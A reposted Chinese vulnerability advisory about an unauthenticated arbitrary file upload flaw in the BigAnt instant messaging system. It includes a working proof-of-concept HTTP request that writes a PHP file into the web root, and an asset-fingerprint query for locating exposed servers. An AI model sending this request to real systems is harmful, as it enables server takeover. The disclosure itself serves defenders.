2026-02-10 14:46:45 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 大蚂蚁即时通讯系统存在前台任意文件上传漏洞，源于API接口未严格校验文件类型及存储路径，攻击者可通过构造恶意file_info参数利用路径穿越将恶意脚本写入Web根目录实现远程代码执行。影响BigAnt5.5.x及以上版本，攻击者无需认证即可上传Webshell获取服务器控制权限。建议立即升级至官方最新安全版本或在WAF中配置规则过滤路径穿越字符。 综合评分： 82 文章分类： 漏洞分析,漏洞预警,渗透测试,漏洞POC,安全运营

cover_image

大蚂蚁即时通讯系统任意文件上传漏洞附POC

原创

安服仔安服仔

北风漏洞复现文库

2026年2月9日 10:39 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

大蚂蚁即时通讯系统任意文件上传漏洞

—

影响版本

—

漏洞简介

大蚂蚁即时通讯系统是一款面向企业及政府机构的国产即时通讯平台，支持私有化部署，提供端到端数据加密、权限控制等安全功能，涵盖即时消息、文件传输、远程协助、音视频会议、文档管理等核心功能，支持多终端接入，适用于大型组织架构，可与企业现有业务系统深度集成，满足企业内部高效沟通与协作需求。任意文件上传漏洞源于大蚂蚁即时通讯系统的接口在处理文件上传时，未对上传文件的类型及存储路径进行严格校验。攻击者可通过构造恶意的参数，绕过系统预设的存储目录限制，将恶意文件直接写入Web根目录，从而获取服务器控制权限。

—

资产测绘

(body="/Public/static/admin/admin_common.js"&nbsp;&& body="/Public/lang/zh-cn.js.js")||title="即时通讯 系统登录"&& body="/Public/static/ukey/Syunew3.js"

—

漏洞复现

POC

POST&nbsp;/?m=Api&c=DispersedAddin&a=upload_file&nbsp;HTTP/1.1Host:&nbsp;127.0.0.1Content-Type:&nbsp;multipart/form-data; boundary=----WebKitFormBoundaryl7npyIb86NUax9XxContent-Length:&nbsp;307
------WebKitFormBoundaryl7npyIb86NUax9XxContent-Disposition: form-data; name="file_info"
[{"file_path":"test123.php"}]------WebKitFormBoundaryl7npyIb86NUax9XxContent-Disposition: form-data; name="file"; filename="1.txt"
<?=md5(123);unlink(__FILE__);------WebKitFormBoundaryl7npyIb86NUax9Xx--

在URL后面拼接路径/test123.php http://127.0.0.1/test123.php

—

修复建议

升级至最新安全版本

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库安服仔安服仔《大蚂蚁即时通讯系统任意文件上传漏洞附POC》